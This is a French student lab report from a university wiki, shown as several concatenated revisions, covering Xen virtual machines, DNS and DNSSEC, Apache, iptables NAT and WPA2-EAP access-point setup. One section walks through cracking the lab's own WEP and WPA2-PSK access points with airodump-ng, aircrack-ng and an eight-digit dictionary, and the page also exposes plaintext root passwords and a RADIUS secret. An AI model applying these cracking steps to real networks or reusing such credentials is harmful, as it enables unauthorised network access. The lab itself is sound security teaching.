aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface Dot11Radio0<br />
ssid VM_SERVICES_5<br />
exit<br />
<br />
<br />
</syntaxhighlight><br />
<br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
conf t<br />
vlan 15<br />
name E5-Cedric<br />
exit<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
wifi-E306(config)#interface GigabitEthernet0.15<br />
wifi-E306(config-subif)#encapsulation dot1Q 15<br />
wifi-E306(config-subif)#bridge-group 15<br />
wifi-E306(config-subif)#bridge-group 15 spanning-disabled<br />
wifi-E306(config-subif)#no bridge-group 15 source-learning<br />
wifi-E306(config-subif)#exit<br />
wifi-E306(config)#exit<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
wifi-E306(config)#int dot11radio0 <br />
wifi-E306(config-if)#encryption vlan 5 mode ciphers aes-ccm <br />
wifi-E306(config-if)#ssid VM_SERVICES_5<br />
wifi-E306(config-if)#exit<br />
wifi-E306(config)#exit<br />
wifi-E306#sh run<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
bridge-group 15 subscriber-loop-control<br />
bridge-group 15 spanning-disabled<br />
bridge-group 15 block-unknown-source<br />
no bridge-group 15 source-learning<br />
no bridge-group 15 unicast-flooding<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12220
Atelier SysRes SE4 2025/2026 E5
2026-02-10T17:06:34Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface Dot11Radio0<br />
ssid VM_SERVICES_5<br />
exit<br />
<br />
<br />
</syntaxhighlight><br />
<br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
conf t<br />
vlan 15<br />
name E5-Cedric<br />
exit<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
wifi-E306(config)#interface GigabitEthernet0.15<br />
wifi-E306(config-subif)#encapsulation dot1Q 15<br />
wifi-E306(config-subif)#bridge-group 15<br />
wifi-E306(config-subif)#bridge-group 15 spanning-disabled<br />
wifi-E306(config-subif)#no bridge-group 15 source-learning<br />
wifi-E306(config-subif)#exit<br />
wifi-E306(config)#exit<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
bridge-group 15 subscriber-loop-control<br />
bridge-group 15 spanning-disabled<br />
bridge-group 15 block-unknown-source<br />
no bridge-group 15 source-learning<br />
no bridge-group 15 unicast-flooding<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12218
Atelier SysRes SE4 2025/2026 E5
2026-02-10T17:05:38Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
